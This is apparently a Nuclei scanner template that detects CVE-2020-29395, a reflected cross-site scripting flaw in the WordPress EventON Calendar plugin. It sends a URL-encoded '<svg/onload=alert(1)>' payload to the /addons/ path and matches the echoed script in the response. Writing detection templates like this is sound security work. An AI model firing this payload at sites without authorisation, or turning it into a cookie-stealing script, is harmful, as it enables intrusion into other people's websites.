32 lines
704 B
YAML
32 lines
704 B
YAML
|
id: CVE-2020-29395
|
||
|
|
||
|
info:
|
||
|
name: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting (XSS)
|
||
|
author: daffainfo
|
||
|
severity: medium
|
||
|
reference: |
|
||
|
- https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-29395
|
||
|
tags: cve,cve2020,wordpress,xss,wp-plugin
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- '{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E'
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
words:
|
||
|
- "<svg/onload=alert(1)>"
|
||
|
part: body
|
||
|
|
||
|
- type: word
|
||
|
part: header
|
||
|
words:
|
||
|
- text/html
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|